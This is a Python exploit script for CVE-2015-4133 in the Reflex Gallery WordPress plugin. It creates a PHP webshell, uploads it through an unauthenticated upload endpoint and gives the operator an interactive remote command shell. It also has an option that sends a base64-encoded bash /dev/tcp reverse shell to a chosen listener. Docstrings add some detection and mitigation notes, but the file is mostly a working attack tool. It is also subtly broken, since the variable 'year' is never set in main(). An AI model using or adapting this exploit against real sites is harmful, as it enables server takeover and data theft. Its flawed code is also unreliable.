#!/usr/bin/python
# Libraries
import requests
import sys
import argparse
import os
import re
import time
import base64
# Colors
class c:
    """ANSI SGR escape sequences used to colour terminal output.

    Each attribute is a plain string: prefix it to the text to colour and
    append ``END`` to reset the terminal attributes afterwards.
    """

    # Reset and decoration
    END = "\x1b[0m"
    UNDERLINE = "\x1b[4m"
    # Bright foreground colours (SGR 91-96)
    RED = "\x1b[91m"
    GREEN = "\x1b[92m"
    YELLOW = "\x1b[93m"
    BLUE = "\x1b[94m"
    PURPLE = "\x1b[95m"
    CYAN = "\x1b[96m"
# Print banner
def banner():
    """Print the ASCII-art banner in yellow.

    Output-only helper: writes the multi-line banner to stdout wrapped in
    ``c.YELLOW`` / ``c.END``, so it depends on the ``c`` colour class.
    The banner text is kept exactly as authored; its alignment depends on
    the escaped backslashes being preserved verbatim.
    """
    exp_banner = """ ___ __ _ ___ _ _ ____ _ ____ ___ _ _ _
| _ \\___ / _| |_____ __ / __|__ _| | |___ _ _ _ _ |__ / / | |__ / | __|_ ___ __| |___(_) |_
| / -_) _| / -_) \\ / | (_ / _` | | / -_) '_| || | |_ \\_| |_ |_ \\ | _|\\ \\ / '_ \\ / _ \\ | _|
|_|_\\___|_| |_\\___/_\\_\\ \\___\\__,_|_|_\\___|_| \\_, | |___(_)_(_)___/ |___/_\\_\\ .__/_\\___/_|\\__|
|__/ |_| """
    print(c.YELLOW + exp_banner + c.END)
# Add arguments
def parser():
    """Build the command-line parser and parse ``sys.argv``.

    Returns:
        argparse.Namespace with two attributes, ``url`` and ``year``; both
        are optional strings and are ``None`` when the flag is not given.
    """
    arg_parser = argparse.ArgumentParser(
        description="CVE-2015-4133 - Reflex Gallery 3.13 Exploit - Arbitrary File Upload to RCE"
    )
    # (short flag, long flag, help text) for each optional argument
    option_specs = (
        ("-u", "--url", "base URL of the wordpress target"),
        ("-y", "--year", "year to look for under wordpress uploads folder"),
    )
    for short_flag, long_flag, help_text in option_specs:
        arg_parser.add_argument(short_flag, long_flag, required=False, help=help_text)
    return arg_parser.parse_args()
# Execute commands once webshell is uploaded
def execute_commands(url, webshell_name, year):
    """Interactive loop that relays each typed line to the uploaded PHP file.

    Every non-local command is sent as the ``cmd`` query-string parameter of a
    GET to ``<url>wp-content/uploads/<year>/09/<webshell_name>`` and the
    response body is printed verbatim.  The loop only ends through
    ``exit``/``quit`` (``sys.exit(0)``) or an interrupt handled by the caller.

    Args:
        url: base URL of the site; ``main()`` appends a trailing "/" before
            calling this function.
        webshell_name: file name extracted from the upload response.
        year: uploads sub-folder year, interpolated with ``str()``.

    Detection note: on the server side this loop appears as repeated GETs to
    a single file under ``wp-content/uploads/`` that carry a ``cmd=``
    parameter, preceded by the two probe requests below.
    """
    # Two probe commands build the prompt; their output is used as-is, so a
    # non-executing response (e.g. an error page) still becomes the prompt text.
    whoami = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=whoami").text
    whoami = whoami.strip()
    hostname = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=hostname -I").text
    hostname = hostname.strip()
    print(c.BLUE + "\nType " + c.YELLOW + "help" + c.BLUE + " to see extra functions\n" + c.END)
    while True:
        command_to_exec = input(whoami + "@" + hostname + ":~$ ")
        # Anything that is not one of the local keywords below is forwarded
        # unencoded in the query string; no timeout is set on this request.
        if command_to_exec != "exit" and command_to_exec != "quit" and command_to_exec != "help" and not command_to_exec.startswith("rev ") and command_to_exec != "clear" and command_to_exec != "cls" and command_to_exec != "?":
            command_out = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + command_to_exec).text
            print("\n" + command_out)
        if command_to_exec == "help" or command_to_exec == "?":
            print(c.YELLOW + "\nCommands\t\tDescription" + c.END)
            print(c.YELLOW + "--------\t\t-----------" + c.END)
            print(c.BLUE + "rev <ip> <port>\t\tSend a reverse shell to your netcat listener" + c.END)
            print(c.BLUE + "quit/exit\t\tExit from shell" + c.END)
            print(c.BLUE + "clear/cls\t\tClear terminal output" + c.END)
            print(c.BLUE + "help/?\t\t\tPrint this help panel\n" + c.END)
        if command_to_exec == "clear" or command_to_exec == "cls":
            # Runs on the operator's own machine, not on the target.
            os.system("clear")
        if command_to_exec.startswith("rev "):
            print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Sending a reverse shell to your listener...\n" + c.END)
            # Parse IP and port (IndexError if fewer than two tokens follow "rev")
            ip = command_to_exec.split(" ")[1]
            port = command_to_exec.split(" ")[2]
            # Define bash reverse shell
            reverse = f"""bash -i &> /dev/tcp/{ip}/{port} 0>&1"""
            reverse = base64.b64encode(reverse.encode()).decode()
            reverse = f"""echo {reverse} | base64 -d | bash"""
            try:
                rev_command = requests.get(url + "wp-content/uploads/" + str(year) + "/09/" + webshell_name + "?cmd=" + reverse, timeout=3)
            except:
                # NOTE(review): the bare except hides connection and HTTP errors
                # as well as the timeout, so failure is indistinguishable from
                # success here; rev_command is never read.
                pass
        if command_to_exec == "exit" or command_to_exec == "quit":
            print(c.BLUE + "\n[" + c.YELLOW + "*" + c.BLUE + "] Clossing connection, bye!" + c.END)
            sys.exit(0)
# Main function
def main():
    """Parse arguments, probe the target, upload the PHP file, then hand over to execute_commands().

    Side effects: creates and later deletes ``exploit-shell.php`` in the
    current working directory, sends one GET (liveness probe) and one
    multipart POST (upload) to the target, and never returns normally --
    every path ends in ``sys.exit(0)`` or in ``execute_commands()``.

    Detection / mitigation notes (all derived from the requests below):
    the upload is a POST to
    ``wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php``
    with ``Year``/``Month`` query parameters and a multipart field named
    ``qqfile`` whose body is ``<?php system($_REQUEST['cmd']); ?>``; the
    success check looks for ``"fileName"`` and ``true`` in the JSON reply.
    Denying PHP execution under ``wp-content/uploads/`` and restricting
    unauthenticated access to that plugin path both break this flow.
    """
    # Parse arguments
    args = parser()
    # NOTE(review): argparse has already run; with no arguments at all,
    # sys.argv[1] raises IndexError, which the bare except maps to the same
    # message. The first branch only fires for an explicitly empty argv[1].
    try:
        if not sys.argv[1]:
            print("URL not provided, [-h/--help] to show help panel")
            sys.exit(0)
    except:
        print("URL not provided, [-h/--help] to show help panel")
        sys.exit(0)
    banner()
    url = args.url
    # Check if target is live
    time.sleep(0.2)
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Checking connection with target..." + c.END)
    # A connection failure raises out of requests.get here and is not caught.
    checker = requests.get(url, timeout=10)
    time.sleep(0.4)
    # Only 404 and 500 count as "down"; any other status (200, 301, 403, ...)
    # proceeds to the upload step.
    if checker.status_code != 404 and checker.status_code != 500:
        print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] Connection established successfully" + c.END)
    else:
        print(c.BLUE + "[" + c.RED + "-" + c.BLUE + "] Connection refused, exiting" + c.END)
        sys.exit(0)
    try:
        os.remove("exploit-shell.php")
    except:
        # Best-effort removal of a leftover file from a previous run.
        pass
    # Create webshell file
    shell = open("exploit-shell.php", "w")
    shell.write("<?php system($_REQUEST['cmd']); ?>")
    shell.close()
    # Define file content
    # NOTE(review): this handle is never closed; it stays open until the
    # process exits (the file itself is removed below while still open).
    file = {"qqfile": open("exploit-shell.php", "r")}
    if not url.endswith("/"):
        url = url + "/"
    # Upload file
    time.sleep(0.3)
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Uploading malicious file..." + c.END)
    r = requests.post(url + "wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=" + str(year) + "&Month=09", files=file)
    # NOTE(review): raises IndexError when the response carries no "fileName"
    # key, i.e. before the success check below can report the failure.
    uploaded_name = re.findall(r'"fileName":"(.*?)"', r.text)[0].split("/")[-1]
    time.sleep(0.6)
    if uploaded_name != "" and "true" in r.text:
        print(c.BLUE + "[" + c.YELLOW + "+" + c.BLUE + "] File uploaded successfully" + c.END)
    time.sleep(0.3)
    try:
        os.remove("exploit-shell.php")
    except:
        # Best-effort cleanup of the local copy.
        pass
    # "while" loop to execute commands in a fake-shell
    print(c.BLUE + "[" + c.YELLOW + "*" + c.BLUE + "] Trying to establish a shell..." + c.END)
    time.sleep(0.4)
    execute_commands(url, uploaded_name, year)
if __name__ == "__main__":
    # Program starts here: run main() and turn Ctrl-C into a clean exit
    # with status 0 instead of a traceback.
    try:
        main()
    except KeyboardInterrupt:
        print(f"{c.BLUE}\n\nInterrupt handler received, exiting...{c.END}")
        raise SystemExit(0)